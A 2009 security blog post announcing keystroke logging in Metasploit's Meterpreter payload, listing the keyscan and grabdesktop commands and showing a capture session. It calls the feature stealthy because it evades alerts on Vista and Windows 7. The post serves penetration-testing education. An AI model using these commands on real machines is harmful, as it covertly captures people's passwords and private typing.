Security and Networking - Blog - Keystroke Logging comes to Meterpreter

Sunday

Mar222009

Keystroke Logging comes to Meterpreter

Sunday, March 22, 2009 at 9:58PM

Today HD committed to the development tree of SVN bug fixes and updates to Meterpreter, among them the coolest of them all has to be the availability of keystroke logging. Now when you use Meterpreter as a payload you will get in the stdapi the ability to start Keystroke Login by running a simple set of commands. The new commands appear as follows:

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    grabdesktop    Take over the active input desktop (needed for keyboard sniffing)
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    uictl          Control some of the user interface components

The new commands are grabdesktop, keyscan_dump, keyscan_start and keyscan_stop. To start the capture of keystrokes we must firs run grabdesktop and then keyscan_start, this will start the capture of all keyboard input into memory.

meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...

To dump the content of the buffer we run keyscan_dump, for this example I capture some text I typed into notepad:

meterpreter > keyscan_dump
Dumping captured keystrokes...
 <Back> epnow this a <Back> s a killer feature!!!!!!!! <Return>
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >

Once the keystrokes are dumped they are cleared from the buffer, so save the output every time you do a dump since it will be lost. This new feature will only capture keyboard input, it will not capture clipboard content or any copy/paste activity, but it is extremely stealthy since it will only reside in memory and in my test machines with Vista with UAC enabled and on Windows 7 it did not trigger any alert. I’m anxiously looking forward on what will come next from the Metasploit team.

UPDATE 3/26/09

HD is making some changes in the code and on the names in the menu, as soon as I have a change to test and run in lab I will post an update to the post.

3 Comments |

Email Article

Print Article

Reader Comments (3)

No problem, I love the project!! in fact those blog posts gave me the ideas for the Meterpreter script I recently posted, as my feed had updated I kept re-writing and improving the script.

March 23, 2009 |

DarkOperator

nice work. found it after hdm posted on the metasploit blog.

March 24, 2009 |

jcran

Excellent work!!
I will probably blog something similar to what the metasploit blog guys did...but in spanish :)

Keep the good work!

March 27, 2009 |

John Doe

Post a New Comment

Enter your information below to add a new comment.

Author:

Author Email (optional):

Author URL (optional):

Post:

↓ | ↑

All HTML will be escaped. Hyperlinks will be created for URLs automatically.

Shell is only the Beginning

Keystroke Logging comes to Meterpreter

Reader Comments (3)

Post a New Comment